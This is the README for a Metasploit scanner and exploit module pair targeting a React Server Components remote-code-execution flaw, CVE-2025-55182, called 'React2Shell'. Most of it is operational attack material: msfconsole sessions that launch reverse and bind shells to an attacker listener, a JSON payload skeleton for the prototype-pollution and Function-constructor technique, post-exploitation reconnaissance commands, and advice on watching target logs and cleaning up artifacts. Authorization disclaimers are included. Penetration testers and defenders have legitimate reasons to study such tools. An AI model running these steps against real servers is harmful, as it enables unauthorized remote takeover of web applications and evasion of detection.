Fully compliant Metasploit modules for exploiting the React2Shell vulnerability (CVE-2025-55182) in React Server Components. Developed following strict Metasploit Framework auditor rules to ensure upstream compatibility.
- Scanner Module (
auxiliary/scanner/http/react2shell.rb) - Non-destructive vulnerability detection - Exploit Module (
exploits/multi/http/react2shell_rce.rb) - Exploitation using native Metasploit payloads
- β Native Framework: Uses exclusively Metasploit mixins and utilities
- β Separation of Concerns: Scanner only detects, exploit only exploits
- β
Payload System: Uses
payload.encodedfrom Metasploit's native system - β
Error Handling: Robust handling with
fail_with()andFailure::*codes - β Upstream Ready: Ready for contribution to Rapid7's official repository
- Metasploit Framework 6.0+
- Ruby 2.7+
- Testing Gems:
rspec,rspec-quickcheck(for development)
# 1. Clone the repository
git clone https://github.com/MoisesTapia/react2shell-metasploit.git
cd react2shell-metasploit
# 2. Copy modules to Metasploit
sudo cp modules/auxiliary/scanner/http/react2shell.rb \
/usr/share/metasploit-framework/modules/auxiliary/scanner/http/
sudo cp modules/exploits/multi/http/react2shell_rce.rb \
/usr/share/metasploit-framework/modules/exploits/multi/http/
# 3. Reload Metasploit
msfconsole -q -x "reload_all"# 1. Clone and setup
git clone https://github.com/MoisesTapia/react2shell-metasploit.git
cd react2shell-metasploit
# 2. Install dependencies
bundle install
# 3. Run tests
rspec spec/msf6 > use auxiliary/scanner/http/react2shell
msf6 auxiliary(scanner/http/react2shell) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/http/react2shell) > set TARGETURI /api/react
msf6 auxiliary(scanner/http/react2shell) > run# Basic configuration
msf6 > use exploit/multi/http/react2shell_rce
msf6 exploit(multi/http/react2shell_rce) > set RHOSTS target.example.com
msf6 exploit(multi/http/react2shell_rce) > set TARGETURI /api/react
# Use native Metasploit payload
msf6 exploit(multi/http/react2shell_rce) > set payload cmd/unix/reverse_bash
msf6 exploit(multi/http/react2shell_rce) > set LHOST 192.168.1.50
msf6 exploit(multi/http/react2shell_rce) > set LPORT 4444
# Check vulnerability before exploiting
msf6 exploit(multi/http/react2shell_rce) > check
# Execute exploit
msf6 exploit(multi/http/react2shell_rce) > run# Reverse shells
set payload cmd/unix/reverse_bash
set payload cmd/unix/reverse_netcat
set payload cmd/windows/reverse_powershell
# Bind shells
set payload cmd/unix/bind_netcat
set payload cmd/windows/bind_powershell
# Command execution
set payload cmd/unix/generic
set payload cmd/windows/generic- RHOSTS: Target host(s) to scan
- RPORT: Service port (default: 80/443)
- SSL: Use SSL/TLS (auto-detected)
- TARGETURI: React Server Components endpoint (default: /)
- RHOSTS: Target host(s) to exploit
- RPORT: Service port (default: 80/443)
- SSL: Use SSL/TLS (auto-detected)
- TARGETURI: Vulnerable endpoint (default: /)
- Payload Options: Specific configuration for selected payload
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Metasploit Framework β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ€
β βββββββββββββββββββββββββββ βββββββββββββββββββββββββββββββ β
β β Scanner Module β β Exploit Module β β
β β (auxiliary/scanner) β β (exploit/remote) β β
β β β β β β
β β - Msf::Auxiliary β β - Msf::Exploit::Remote β β
β β - Msf::Auxiliary:: β β - Msf::Exploit::Remote:: β β
β β Scanner β β HttpClient β β
β β - Msf::Exploit::Remote::β β β β
β β HttpClient β β - Uses payload.encoded β β
β β β β - ARCH_CMD compatible β β
β β - Non-destructive only β β - Native Metasploit β β
β β - CheckCode reporting β β payloads only β β
β β - report_vuln() β β β β
β βββββββββββββββββββββββββββ βββββββββββββββββββββββββββββββ β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
- Non-Destructive Detection: Only sends test payloads that don't execute commands
- CheckCode Compliance: Returns standard codes (Vulnerable, Appears, Safe, Unknown)
- Standard Reporting: Uses
report_vuln()with all required parameters - Native HTTP: Uses exclusively
send_request_cgi()andnormalize_uri()
- Native Payload System: Uses only
payload.encodedfrom Metasploit - ARCH_CMD Support: Compatible with all Metasploit command payloads
- Robust Error Handling: Uses
fail_with()with appropriateFailure::*codes - Check Method: Reuses scanner logic for pre-exploitation verification
Vulnerability in React Server Components (RSC) that allows remote code execution through unsafe deserialization of the Flight Protocol.
Affected Versions:
- Next.js 14.3.x-canary
- Next.js 15.x
- Next.js 16.x
- React Server Components with Flight Protocol
Exploitation Technique:
- Prototype Pollution: Abuse of
_prefixfield in RSC chunks - Function Constructor: Transform
_formData.getintoFunction()constructor - Code Execution: Execute arbitrary JavaScript on the server
- Payload Integration: Use Metasploit's native payload system
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B0\"}",
"_response": {
"_prefix": "PAYLOAD_HERE",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}- Verify connectivity to target
- Confirm TARGETURI points to correct endpoint
- Review logs with
set VERBOSE true
- Verify target uses React Server Components
- Confirm vulnerable Next.js/React version
- Try different endpoints with TARGETURI
[*] Exploit failed [bad-config]: No payload available
- Select compatible payload:
set payload cmd/unix/reverse_bash - Configure payload options:
set LHOST,set LPORT
[*] Exploit failed [unreachable]: Connection failed
- Verify network connectivity
- Confirm port is open
- Review proxy/SSL configuration
[*] Exploit failed [unexpected-reply]: Server responded with code 404
- Verify correct TARGETURI
- Confirm endpoint is vulnerable
- Run
checkbefore exploit
# Enable detailed output
set VERBOSE true
# Show all options
show options
# Show available payloads
show payloads# Unit tests
rspec spec/ --format documentation
# Compliance tests
rspec spec/ --tag compliance
# Integration tests
rspec spec/ --tag integration# Setup environment
bundle install --path vendor/bundle
# Code linting
rubocop modules/ spec/
# Security analysis
semgrep --config=.semgrep.yml modules/
# Code smell detection
reek modules/react2shell-metasploit/
βββ modules/
β βββ auxiliary/scanner/http/
β β βββ react2shell.rb # Scanner module
β βββ exploits/multi/http/
β βββ react2shell_rce.rb # Exploit module
βββ spec/ # Tests
βββ .github/ # CI/CD workflows
βββ .rubocop.yml # Linting config
βββ .semgrep.yml # Security scanning
βββ .reek.yml # Code smell detection
βββ Gemfile # Dependencies
βββ README.md # This documentation
- Only use on owned systems or with explicit written authorization
- Follow responsible disclosure practices for discovered vulnerabilities
- Comply with local laws and cybersecurity regulations
- Document and report usage in security audits
- Use in laboratory environments for testing
- Monitor target logs for detection indicators
- Clean up artifacts after successful exploitation
- Maintain confidentiality of obtained data
# Basic system information
msf6 exploit(multi/http/react2shell_rce) > set payload cmd/unix/generic
msf6 exploit(multi/http/react2shell_rce) > set CMD "uname -a && whoami && id"
msf6 exploit(multi/http/react2shell_rce) > run
# Running processes
msf6 exploit(multi/http/react2shell_rce) > set CMD "ps aux | head -20"
msf6 exploit(multi/http/react2shell_rce) > run
# Network connections
msf6 exploit(multi/http/react2shell_rce) > set CMD "netstat -tulpn"
msf6 exploit(multi/http/react2shell_rce) > run# Setup listener
msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload cmd/unix/reverse_bash
msf6 exploit(multi/handler) > set LHOST 192.168.1.50
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run -j
# Execute exploit in another session
msf6 > use exploit/multi/http/react2shell_rce
msf6 exploit(multi/http/react2shell_rce) > set RHOSTS target.example.com
msf6 exploit(multi/http/react2shell_rce) > set payload cmd/unix/reverse_bash
msf6 exploit(multi/http/react2shell_rce) > set LHOST 192.168.1.50
msf6 exploit(multi/http/react2shell_rce) > set LPORT 4444
msf6 exploit(multi/http/react2shell_rce) > runThis project strictly follows Metasploit Framework Guidelines:
- No Custom Frameworks: Only native Metasploit components
- Separation of Concerns: Scanner detects, exploit exploits
- Native Payload System: Exclusive use of
payload.encoded - Standard Error Handling:
fail_with()with appropriate codes - Proper Reporting: Standard
report_vuln()andstore_loot()
- Extend only approved Metasploit base classes
- Use native mixins (
Scanner,HttpClient, etc.) - Implement required methods (
run_host,check,exploit) - Use
send_request_cgi()for HTTP operations - Handle errors with specific Rex exceptions
- Report vulnerabilities with standard parameters
- Test with multiple Metasploit payloads
- Document compliance decisions
- Fork the repository
- Create feature branch:
git checkout -b feature/new-functionality - Follow Metasploit compliance rules
- Add tests for new functionality
- Commit changes:
git commit -am 'Add new functionality' - Push to branch:
git push origin feature/new-functionality - Create Pull Request with detailed description
- Metasploit Framework Documentation
- Rapid7 Module Guidelines
- React Server Components
- Next.js Security
- RuboCop - Ruby linting
- Reek - Code smell detection
- Semgrep - Static security analysis
- RSpec - Testing framework
This project is licensed under the Metasploit Framework License (MSF_LICENSE).
This software is provided "as is" without warranties of any kind. The authors are not responsible for misuse of this tool. Using this software to attack systems without explicit authorization is illegal and strictly prohibited.
- β Authorized security audits
- β Ethical security research
- β Laboratory and testing environments
- β Unauthorized attacks
- β Malicious activities
- β Terms of service violations
Developed by: Moises Tapia (Cl0wnr3v)
Specialization: Cloud Security Architect, Cloud Penetration Tester & Red Teamer
Version: 1.0.0
Last updated: January 2025
Project Status: β Metasploit Framework Compliant | β Ready for Upstream Submission